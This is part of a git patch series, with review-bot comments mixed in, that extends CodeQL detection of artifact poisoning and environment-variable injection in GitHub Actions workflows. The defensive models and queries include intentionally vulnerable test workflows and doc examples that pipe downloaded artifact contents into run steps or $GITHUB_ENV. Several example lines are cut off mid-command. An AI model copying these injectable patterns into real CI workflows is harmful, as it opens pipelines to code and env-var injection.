.github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | | .github/workflows/artifactpoisoning11.yml:32:9:36:6 | Run Step | .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:32:9:36:6 | Run Step | -| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:36:9:38:62 | Run Step | -| .github/workflows/artifactpoisoning12.yml:32:9:36:6 | Run Step | .github/workflows/artifactpoisoning12.yml:36:9:38:62 | Run Step | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:36:9:38:26 | Run Step | +| .github/workflows/artifactpoisoning12.yml:32:9:36:6 | Run Step | 
.github/workflows/artifactpoisoning12.yml:36:9:38:26 | Run Step | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:18:9:20:21 | Run Step | | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:17:9:18:20 | Run Step | | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:15:9:18:6 | Run Step | @@ -40,9 +36,7 @@ edges | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:15:9:18:6 | Run Step | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | | .github/workflows/artifactpoisoning53.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | -| .github/workflows/artifactpoisoning61.yml:20:9:41:6 | Uses Step | .github/workflows/artifactpoisoning61.yml:41:9:53:6 | Run Step: prepare | -| .github/workflows/artifactpoisoning61.yml:20:9:41:6 | Uses Step | .github/workflows/artifactpoisoning61.yml:53:9:53:50 | Run Step | -| .github/workflows/artifactpoisoning61.yml:41:9:53:6 | Run Step: prepare | .github/workflows/artifactpoisoning61.yml:53:9:53:50 | Run Step | +| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:16:9:18:40 | Run Step | | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | From 8289bf97b9da5faae3fc46125c6516e1939e96f2 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 12 Jul 2024 11:10:01 +0200 Subject: [PATCH 406/707] feat(models): Add support for artifact to step output --- .../codeql/actions/dataflow/ExternalFlow.qll | 9 ++++- ql/lib/ext/manual/read-file-actions.model.yml | 33 +++++++++++++++++++ .../.github/workflows/artifactpoisoning5.yml | 2 +- .../CWE-094/CodeInjectionCritical.expected | 6 ++++ .../CWE-094/CodeInjectionMedium.expected | 5 +++ 5 files changed, 53 insertions(+), 2 deletions(-) create mode 100644 ql/lib/ext/manual/read-file-actions.model.yml
diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll
index 1d1b0c6a7199..9ddba387b512 100644
--- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll
+++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll
@@ -1,6 +1,7 @@
+private import actions
 private import internal.ExternalFlowExtensions as Extensions
 private import codeql.actions.DataFlow
-private import actions
+private import codeql.actions.security.ArtifactPoisoningQuery
 /**
 * MaD sources
@@ -91,6 +92,12 @@ predicate madStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::Conte
 or
 input.trim().matches("input.%") and
 pred.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input.", ""))
+ or
+ input.trim() = "artifact" and
+ exists(UntrustedArtifactDownloadStep download |
+ pred.asExpr() = download and
+ download.getAFollowingStep() = uses
+ )
 ) and
 succ.asExpr() = uses
 )
diff --git a/ql/lib/ext/manual/read-file-actions.model.yml b/ql/lib/ext/manual/read-file-actions.model.yml
new file mode 100644
index 000000000000..1b9bd745a65a
--- /dev/null
+++ b/ql/lib/ext/manual/read-file-actions.model.yml
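Review bot: The new `input.trim() = "artifact"` branch in madStoreStep relates a modelled read-file action to every UntrustedArtifactDownloadStep for which `download.getAFollowingStep() = uses` holds, and never compares the action's path input with where the artifact was downloaded, so the outputs of any such action are treated as tainted after any earlier artifact download. That is a defensible over-approximation for a security query, but it should be stated at the branch, e.g. `// "artifact" rows: the step's outputs are tainted whenever an untrusted artifact download precedes it; the path actually read is not checked`. The rest of madStoreStep, including where `uses`, `input` and `succ` are bound, lies outside the hunk.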
@@ -0,0 +1,33 @@
+extensions:
+ - addsTo:
+ pack: github/actions-all
+ extensible: actionsSummaryModel
+ data:
+ - ["juliangruber/read-file-action", "*", "artifact", "output.content", "taint", "manual"]
+ - ["bfren/read-file", "*", "artifact", "output.contents", "taint", "manual"]
+ - ["igorskyflyer/action-readfile", "*", "artifact", "output.content", "taint", "manual"]
+ - ["komorebitech/read-files-action", "*", "artifact", "output.content", "taint", "manual"]
+ - ["jaywcjlove/github-action-read-file", "*", "artifact", "output.content", "taint", "manual"]
+ - ["andstor/file-reader-action", "*", "artifact", "output.contents", "taint", "manual"]
+ - ["Reedyuk/read-properties", "*", "artifact", "output.value", "taint", "manual"]
+ - ["browniebroke/read-nvmrc-action", "*", "artifact", "output.node_version", "taint", "manual"]
+ - ["jbutcher5/read-yaml", "*", "artifact", "output.data", "taint", "manual"]
+ - ["christian-draeger/read-properties", "*", "artifact", "output.*", "taint", "manual"]
+ - ["traversals-analytics-and-intelligence/file-reader-action", "*", "artifact", "output.content", "taint", "manual"]
+ - ["pietrobolcato/action-read-yaml", "*", "artifact", "output.*", "taint", "manual"]
+ - ["satya-500/read-file-github-action", "*", "artifact", "output.contents", "taint", "manual"]
+ - ["guibranco/github-file-reader-action-v2", "*", "artifact", "output.contents", "taint", "manual"]
+ - ["gagle/package-version", "*", "artifact", "output.version", "taint", "manual"]
+ - ["ActionsTools/read-json-action", "*", "artifact", "output.*", "taint", "manual"]
+ - ["madhead/read-java-properties", "*", "artifact", "output.*", "taint", "manual"]
+ - ["pietrobolcato/action-read-yaml", "*", "artifact", "output.*", "taint", "manual"]
+ - ["rexdefuror/read-package-json", "*", "artifact", "env.*", "taint", "manual"]
+ - ["BrycensRanch/read-properties-action", "*", "artifact", "output.*", "taint", "manual"]
+ - ["kurt-code/gha-properties", "*", "artifact", "output.*", "taint", "manual"]
+ - ["SebRollen/toml-action", "*", "artifact", "output.value", "taint", "manual"]
+ - ["simonblund/version-reader", "*", "artifact", "output.version", "taint", "manual"]
+ - ["mindsers/changelog-reader-action", "*", "artifact", "output.*", "taint", "manual"]
+ - ["nichmor/minimal-read-yaml", "*", "artifact", "output.*", "taint", "manual"]
+ - ["miraai/read-helm-chart-yaml", "*", "artifact", "output.*", "taint", "manual"]
+ - ["dangdennis/toml-action", "*", "artifact", "output.value", "taint", "manual"]
+ - ["artlaman/conventional-changelog-reader-action", "*", "artifact", "output.*", "taint", "manual"]
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning5.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning5.yml
index 633c45661e59..4a2b9b50eb67 100644
--- a/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning5.yml
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning5.yml
@@ -19,5 +19,5 @@ jobs:
 with:
 path: ./artifact.txt
 - name: Use artifact
- run: echo ${{ steps.artifact.outputs.contents }}
+ run: echo ${{ steps.artifact.outputs.content }}
diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected
index 370241c7ac00..2e0f79da4a00 100644
--- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected
+++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected
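Review bot: `pietrobolcato/action-read-yaml` appears twice in the new read-file-actions.model.yml with identical columns, so one of the two rows should be dropped. `rexdefuror/read-package-json` is the only row whose output column is `env.*` rather than `output.*`; if that action really exports the file contents as environment variables the row is correct, but a `# exports the parsed values as env vars, not step outputs` comment next to it would stop it reading as a typo. Since every row uses `artifact` as its input column, each action is reported whenever it runs after any untrusted artifact download, whatever path it is given; the file header would be a good place to say that the models are intentionally path-insensitive.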
@@ -9,6 +9,8 @@ edges | .github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning4.yml:19:14:19:58 | echo "::set-output name=id::$( Date: Fri, 12 Jul 2024 12:43:25 +0200 Subject: [PATCH 407/707] feat(models): Add dotenv models Envvar-injection sinks --- ql/lib/ext/manual/Steph0_dotenv-configserver.model.yml | 6 ++++++ ql/lib/ext/manual/aarcangeli_load-dotenv.model.yml | 6 ++++++ ql/lib/ext/manual/akefirad_loadenv-action.model.yml | 7 +++++++ ql/lib/ext/manual/c-py_action-dotenv-to-setenv.model.yml | 6 ++++++ ql/lib/ext/manual/cosq-network_dotenv-loader.model.yml | 6 ++++++ .../manual/luizfelipelaviola_parse-plain-dotenv.model.yml | 6 ++++++ ql/lib/ext/manual/read-file-actions.model.yml | 4 ++++ ql/lib/ext/manual/xom9ikk_dotenv.model.yml | 6 ++++++ 8 files changed, 47 insertions(+) create mode 100644 ql/lib/ext/manual/Steph0_dotenv-configserver.model.yml create mode 100644 ql/lib/ext/manual/aarcangeli_load-dotenv.model.yml create mode 100644 ql/lib/ext/manual/akefirad_loadenv-action.model.yml create mode 100644 ql/lib/ext/manual/c-py_action-dotenv-to-setenv.model.yml create mode 100644 ql/lib/ext/manual/cosq-network_dotenv-loader.model.yml create mode 100644 ql/lib/ext/manual/luizfelipelaviola_parse-plain-dotenv.model.yml create mode 100644 ql/lib/ext/manual/xom9ikk_dotenv.model.yml
diff --git a/ql/lib/ext/manual/Steph0_dotenv-configserver.model.yml b/ql/lib/ext/manual/Steph0_dotenv-configserver.model.yml
new file mode 100644
index 000000000000..ad7fb8a538cc
--- /dev/null
+++ b/ql/lib/ext/manual/Steph0_dotenv-configserver.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: github/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["Steph0/dotenv-configserver", "*", "input.repository", "envvar-injection", "manual"]
diff --git a/ql/lib/ext/manual/aarcangeli_load-dotenv.model.yml b/ql/lib/ext/manual/aarcangeli_load-dotenv.model.yml
new file mode 100644
index 000000000000..cf23452f7a99
--- /dev/null
+++ b/ql/lib/ext/manual/aarcangeli_load-dotenv.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: github/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["aarcangeli/load-dotenv", "*", "artifact", "envvar-injection", "manual"]
diff --git a/ql/lib/ext/manual/akefirad_loadenv-action.model.yml b/ql/lib/ext/manual/akefirad_loadenv-action.model.yml
new file mode 100644
index 000000000000..8f14138168c7
--- /dev/null
+++ b/ql/lib/ext/manual/akefirad_loadenv-action.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: github/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["akefirad/loadenv-action", "*", "artifact", "envvar-injection", "manual"]
+
diff --git a/ql/lib/ext/manual/c-py_action-dotenv-to-setenv.model.yml b/ql/lib/ext/manual/c-py_action-dotenv-to-setenv.model.yml
new file mode 100644
index 000000000000..264c3f7b2424
--- /dev/null
+++ b/ql/lib/ext/manual/c-py_action-dotenv-to-setenv.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: github/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["c-py/action-dotenv-to-setenv", "*", "artifact", "envvar-injection", "manual"]
diff --git a/ql/lib/ext/manual/cosq-network_dotenv-loader.model.yml b/ql/lib/ext/manual/cosq-network_dotenv-loader.model.yml
new file mode 100644
index 000000000000..f00774d1c4ad
--- /dev/null
+++ b/ql/lib/ext/manual/cosq-network_dotenv-loader.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: github/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["cosq-network/dotenv-loader", "*", "artifact", "envvar-injection", "manual"]
diff --git a/ql/lib/ext/manual/luizfelipelaviola_parse-plain-dotenv.model.yml b/ql/lib/ext/manual/luizfelipelaviola_parse-plain-dotenv.model.yml
new file mode 100644
index 000000000000..c7474549fcb5
--- /dev/null
+++ b/ql/lib/ext/manual/luizfelipelaviola_parse-plain-dotenv.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: github/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["luizfelipelaviola/parse-plain-dotenv", "*", "input.data", "envvar-injection", "manual"]
diff --git a/ql/lib/ext/manual/read-file-actions.model.yml b/ql/lib/ext/manual/read-file-actions.model.yml
index 1b9bd745a65a..3d92eaef263a 100644
--- a/ql/lib/ext/manual/read-file-actions.model.yml
+++ b/ql/lib/ext/manual/read-file-actions.model.yml
@@ -31,3 +31,7 @@ extensions:
 - ["miraai/read-helm-chart-yaml", "*", "artifact", "output.*", "taint", "manual"]
 - ["dangdennis/toml-action", "*", "artifact", "output.value", "taint", "manual"]
 - ["artlaman/conventional-changelog-reader-action", "*", "artifact", "output.*", "taint", "manual"]
+ - ["romanlamsal/dotenv-concat", "*", "artifact", "output.*", "taint", "manual"]
+ - ["sammcj/dotenv-output-action", "*", "artifact", "output.*", "taint", "manual"]
+ - ["c-py/action-dotenv-to-setenv", "*", "artifact", "output.*", "taint", "manual"]
+ - ["duskmoon314/action-load-env", "*", "artifact", "output.*", "taint", "manual"]
diff --git a/ql/lib/ext/manual/xom9ikk_dotenv.model.yml b/ql/lib/ext/manual/xom9ikk_dotenv.model.yml
new file mode 100644
index 000000000000..bfbd4e2f7294
--- /dev/null
+++ b/ql/lib/ext/manual/xom9ikk_dotenv.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: github/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["xom9ikk/dotenv", "*", "artifact", "envvar-injection", "manual"]
From 5785a21d5675e6fba491b6104c6402649cb99496 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 12 Jul 2024 12:44:25 +0200 Subject: [PATCH 408/707] feat(queries): Env-var injection Enable Uses sinks for envvar injection --- .../codeql/actions/dataflow/ExternalFlow.qll | 20 +++++++++++-------- .../actions/security/EnvVarInjectionQuery.qll | 13 ++++++++++++ .../CWE-077/EnvVarInjectionCritical.ql | 6 +++++- .../Security/CWE-077/EnvVarInjectionMedium.ql | 6 +++++- 4 files changed, 35 insertions(+), 10 deletions(-)
diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll
index 9ddba387b512..2914dac5f0a6 100644
--- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll
+++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll
@@ -110,18 +110,22 @@ predicate madSink(DataFlow::Node sink, string kind) {
 exists(Uses uses, string action, string version, string input |
 actionsSinkModel(action, version, input, kind, _) and
 uses.getCallee() = action.toLowerCase() and
- (
- if input.trim().matches("env.%")
- then sink.asExpr() = uses.getInScopeEnvVarExpr(input.trim().replaceAll("env.", ""))
- else
- if input.trim().matches("input.%")
- then sink.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input.", ""))
- else none()
- ) and
+ // version check
 (
 if version.trim() = "*"
 then uses.getVersion() = any(string v)
 else uses.getVersion() = version.trim()
+ ) and
+ // pred provenance
+ (
+ input.trim().matches("env.%") and
+ sink.asExpr() = uses.getInScopeEnvVarExpr(input.trim().replaceAll("env.", ""))
+ or
+ input.trim().matches("input.%") and
+ sink.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input.", ""))
+ or
+ input.trim() = "artifact" and
+ sink.asExpr() = uses
 )
 )
 }
diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll
index f5a3b5f89a8e..8dba1a21c908 100644
--- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll
+++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll
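Review bot: The `// pred provenance` comment above the new disjunction in madSink is carried over from madStoreStep and does not fit here, since madSink has no `pred`; `// sink location: an in-scope env var, an input argument, or the whole Uses step for "artifact" rows` describes what the block does. Note that for the `artifact` case the entire Uses step becomes the sink with no check that any artifact download precedes it, so the precision of every query that consumes this kind rests on whichever flow step feeds the Uses node rather than on madSink itself, which is worth a sentence in the predicate's QLDoc. The old if/then/else chain returned `none()` for unrecognised input columns, and the new disjunction silently does the same, so nothing flags a model row with a mistyped column.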
@@ -45,6 +45,19 @@ class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink {
 }
 }
+/**
+ * Holds if a 3rd party action declares an environment variable with contents from an untrusted file.
+ * e.g.
+*- name: Load .env file
+ * uses: aarcangeli/load-dotenv@v1.0.0
+ * with:
+ * path: 'backend/new'
+ * filenames: |
+ * .env
+ * .env.test
+ * quiet: false
+ * if-file-not-found: error
+ */
 class EnvVarInjectionFromMaDSink extends EnvVarInjectionSink {
 EnvVarInjectionFromMaDSink() { madSink(this, "envvar-injection") }
 }
diff --git a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql
index 320feb4e1335..89e1ddd3cc2d 100644
--- a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql
+++ b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql
@@ -14,6 +14,7 @@
 import actions
 import codeql.actions.security.EnvVarInjectionQuery
+import codeql.actions.dataflow.ExternalFlow
 import EnvVarInjectionFlow::PathGraph
 from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink
@@ -25,7 +26,10 @@ where
 not source.getNode().(RemoteFlowSource).getSourceType() = "artifact"
 or
 source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and
- sink.getNode() instanceof EnvVarInjectionFromFileReadSink
+ (
+ sink.getNode() instanceof EnvVarInjectionFromFileReadSink or
+ madSink(sink.getNode(), "envvar-injection")
+ )
 )
 select sink.getNode(), source, sink,
 "Potential environment variable injection in $@, which may be controlled by an external user.",
diff --git a/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql b/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql
index bccb61ae6ea6..70c05fc1c95d 100644
--- a/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql
+++ b/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql
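Review bot: The example in the new QLDoc on EnvVarInjectionFromMaDSink drops the comment's `*` column on its first line (`*- name: Load .env file`) and loses the YAML indentation of the `uses:`/`with:` lines under it, so the rendered documentation will not show a readable step; write the first line as ` * - name: Load .env file` and indent the following keys consistently beneath it. The summary sentence could also name the model kind the class is built on, e.g. `Holds if a 3rd party action modelled as an "envvar-injection" sink loads environment variables from a file an attacker may control.`, so a reader knows to look in the ext/manual model files for the list of actions.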
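Review bot: The new `madSink(sink.getNode(), "envvar-injection")` disjunct in the `where` clause duplicates the definition of EnvVarInjectionFromMaDSink (`madSink(this, "envvar-injection")`) that this same commit adds to EnvVarInjectionQuery.qll; `sink.getNode() instanceof EnvVarInjectionFromMaDSink` would keep the sink taxonomy in one place and make the new `import codeql.actions.dataflow.ExternalFlow` in the query unnecessary. The identical edit in EnvVarInjectionMedium.ql has the same issue and should be changed together with this one. The `where` clause begins above the hunk, so the conditions that precede the `artifact` branch are not visible here.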
@@ -14,6 +14,7 @@
 import actions
 import codeql.actions.security.EnvVarInjectionQuery
+import codeql.actions.dataflow.ExternalFlow
 import EnvVarInjectionFlow::PathGraph
 from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink
@@ -25,7 +26,10 @@ where
 not source.getNode().(RemoteFlowSource).getSourceType() = "artifact"
 or
 source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and
- sink.getNode() instanceof EnvVarInjectionFromFileReadSink
+ (
+ sink.getNode() instanceof EnvVarInjectionFromFileReadSink or
+ madSink(sink.getNode(), "envvar-injection")
+ )
 )
 select sink.getNode(), source, sink,
 "Potential environment variable injection in $@, which may be controlled by an external user.",
From e0a075da57ce4dd67a658251af54731f04a3d0e4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 12 Jul 2024 12:45:06 +0200 Subject: [PATCH 409/707] feat(dataflow): Flow through bash assigments on artifact to GH env/output --- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 82 +++++++++++++++++--- 1 file changed, 72 insertions(+), 10 deletions(-)
diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll
index 5e624798d69a..3caf80b7ca8e 100644
--- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll
+++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll
@@ -156,24 +156,72 @@ predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow:: * A downloaded artifact that gets assigned to a Run step output. * - uses: actions/download-artifact@v2 * - run: echo "::set-output name=id::$(> "$GITHUB_ENV" + * - run: | + * foo=$(> "$GITHUB_ENV" + */ predicate artifactToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { exists(Run run, string content, string key, string value, UntrustedArtifactDownloadStep download | - writeToGitHubEnv(run, content) and - extractVariableAndValue(content, key, value) and - value.regexpMatch([".*\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\).*"]) and + ( + // A file is read and its content is assigned to an env var + // - run: | + // foo=$(> "$GITHUB_ENV" + exists(string var_name, string line, string assignment_regexp, string file_read | + run.getScript().splitAt("\n") = line and + assignment_regexp = "([a-zA-Z0-9\\-_]+)=(.*)" and + var_name = line.regexpCapture(assignment_regexp, 1) and + file_read = line.regexpCapture(assignment_regexp, 2) and + outputsPartialFileContent(file_read) and + envToRunExpr(var_name, run, value) and + writeToGitHubEnv(run, content) and + extractVariableAndValue(content, key, value) + ) + or + // A file is read and its content is assigned to an output + // - run: echo "foo=$(> "$GITHUB_ENV" + writeToGitHubEnv(run, content) and + extractVariableAndValue(content, key, value) and + outputsPartialFileContent(value) + ) and c = any(DataFlow::FieldContent ct | ct.getName() = key) and download.getAFollowingStep() = run and pred.asExpr() = run.getScriptScalar() and 
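Review bot: In the new assignment case of artifactToEnvStoreStep, `line.regexpCapture(assignment_regexp, 1)` with `assignment_regexp = "([a-zA-Z0-9\\-_]+)=(.*)"` has to match the whole line, so an assignment that is indented inside a `run: |` block or written as `export foo=$(...)` is not captured unless `getScript()` already strips that; matching on `line.trim()` or widening the pattern to `"\\s*(?:export\\s+)?([a-zA-Z0-9\\-_]+)=(.*)"` would cover the usual forms. The only link between the download and the run step is `download.getAFollowingStep() = run` together with `pred.asExpr() = run.getScriptScalar()`, so whatever file the assignment reads is assumed to be the artifact; a one-line comment at the `exists` saying that the read path is deliberately not checked would make the precision trade-off explicit. The succ side of the predicate continues past the end of the hunk.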
@@ -185,7 +233,7 @@ predicate artifactToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataF
 /**
 * A download artifact step followed by a step that may use downloaded artifacts.
 */
-predicate artifactDownloadToUseStep(DataFlow::Node pred, DataFlow::Node succ) {
+predicate artifactDownloadToRunStep(DataFlow::Node pred, DataFlow::Node succ) {
 exists(UntrustedArtifactDownloadStep download, Run run |
 pred.asExpr() = download and
 succ.asExpr() = run.getScriptScalar() and
@@ -193,6 +241,18 @@ predicate artifactDownloadToUseStep(DataFlow::Node pred, DataFlow::Node succ) {
 )
 }
+/**
+ * A download artifact step followed by a envvar-injection uses step .
+ */
+predicate artifactDownloadToUsesStep(DataFlow::Node pred, DataFlow::Node succ) {
+ exists(UntrustedArtifactDownloadStep download, Uses uses |
+ madSink(succ, "envvar-injection") and
+ pred.asExpr() = download and
+ succ.asExpr() = uses and
+ download.getAFollowingStep() = uses
+ )
+}
+
 /**
 * A read of the _files field of the dorny/paths-filter action.
 */
@@ -254,7 +314,9 @@ predicate xt0rtedSlashCommandActionTaintStep(DataFlow::Node pred, DataFlow::Node
 class TaintSteps extends AdditionalTaintStep {
 override predicate step(DataFlow::Node node1, DataFlow::Node node2) {
 envToRunStep(node1, node2) or
- artifactDownloadToUseStep(node1, node2) or
+ artifactDownloadToRunStep(node1, node2) or
+ artifactDownloadToUsesStep(node1, node2) or
+ // 3rd party actions
 dornyPathsFilterTaintStep(node1, node2) or
 tjActionsChangedFilesTaintStep(node1, node2) or
 tjActionsVerifyChangedFilesTaintStep(node1, node2) or
From a1787596d242dc4c20392ff4805f25e932e563e2 Mon Sep 17 00:00:00 2001
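Review bot: The QLDoc on the new artifactDownloadToUsesStep reads `A download artifact step followed by a envvar-injection uses step .`; `An artifact download step followed by a Uses step that madSink models as an "envvar-injection" sink.` fixes the article and the stray space before the period and names where the sink set comes from. Like artifactDownloadToRunStep above it, the predicate connects the download to the Uses step only through `download.getAFollowingStep() = uses`, so every modelled dotenv action that runs after any artifact download is treated as consuming that artifact, which is worth stating in the same doc comment. The rename to artifactDownloadToRunStep is reflected in TaintSteps, but any other caller of the old name lies outside this hunk.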
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 12 Jul 2024 12:45:19 +0200 Subject: [PATCH 410/707] feat(tests): Update tests --- ql/test/library-tests/test.expected | 31 +++++++++++++++++++ .../CWE-077/.github/workflows/test7.yml | 25 +++++++++++++++ .../CWE-077/EnvVarInjectionCritical.expected | 4 +++ .../CWE-077/EnvVarInjectionMedium.expected | 3 ++ .../CWE-094/CodeInjectionCritical.expected | 16 ++++++++++ .../CWE-094/CodeInjectionMedium.expected | 14 +++++++++ 6 files changed, 93 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test7.yml diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 62b04344f392..0139efb0f83d 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected 
@@ -1083,10 +1083,16 @@ sources | tzkhan/pr-update-action | * | output.headMatch | branch | manual | | xt0rted/pull-request-comment-branch | * | output.head_ref | branch | manual | summaries +| ActionsTools/read-json-action | * | artifact | output.* | taint | manual | +| BrycensRanch/read-properties-action | * | artifact | output.* | taint | manual | +| Reedyuk/read-properties | * | artifact | output.value | taint | manual | +| SebRollen/toml-action | * | artifact | output.value | taint | manual | | akhileshns/heroku-deploy | * | input.branch | output.status | taint | manual | | android-actions/setup-android | * | input.cmdline-tools-version | output.ANDROID_COMMANDLINE_TOOLS_VERSION | taint | manual | +| andstor/file-reader-action | * | artifact | output.contents | taint | manual | | apache/incubator-kie-tools | * | input.pnpm_filter_string | output.pnpm_filter_string | taint | manual | | apple-actions/import-codesign-certs | * | input.keychain-password | output.keychain-password | taint | manual | +| artlaman/conventional-changelog-reader-action | * | artifact | output.* | taint | manual | | ashley-taylor/read-json-property-action | * | input.json | output.value | taint | manual | | ashley-taylor/regex-property-action | * | input.replacement | output.value | taint | manual | | ashley-taylor/regex-property-action | * | input.value | output.value | taint | manual | 
@@ -1100,23 +1106,30 @@ summaries | aws-actions/configure-aws-credentials | * | input.aws-session-token | env.AWS_SESSION_TOKEN | taint | manual | | aws-actions/configure-aws-credentials | * | input.aws-session-token | secret.AWS_SESSION_TOKEN | taint | manual | | aws-powertools/powertools-lambda-python | * | input.artifact_name_prefix | output.artifact_name | taint | manual | +| bfren/read-file | * | artifact | output.contents | taint | manual | | bobheadxi/deployments | * | input.env | output.env | taint | manual | +| browniebroke/read-nvmrc-action | * | artifact | output.node_version | taint | manual | | bufbuild/buf-breaking-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | | bufbuild/buf-lint-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | +| c-py/action-dotenv-to-setenv | * | artifact | output.* | taint | manual | | cachix/cachix-action | * | input.signingKey | env.CACHIX_SIGNING_KEY | taint | manual | +| christian-draeger/read-properties | * | artifact | output.* | taint | manual | | cloudposse/github-action-matrix-outputs-write/.github/workflows/setup-test.yml | * | input.matrix-key | output.result | taint | manual | | coursier/cache-action | * | input.path | env.COURSIER_CACHE | taint | manual | | crazy-max/ghaction-import-gpg | * | input.fingerprint | output.fingerprint | taint | manual | | csexton/release-asset-action | * | input.release-url | output.url | taint | manual | +| dangdennis/toml-action | * | artifact | output.value | taint | manual | | delaguardo/setup-clojure | * | input.boot | env.BOOT_VERSION | taint | manual | | drawpile/drawpile | * | input.cache_key | output.cache_key | taint | manual | | drawpile/drawpile | * | input.path | output.path | taint | manual | +| duskmoon314/action-load-env | * | artifact | output.* | taint | manual | | element-hq/element-desktop/.github/workflows/build_prepare.yaml | * | input.deploy | output.deploy | taint | manual | | envoyproxy/envoy/.github/workflows/_load.yml | * | 
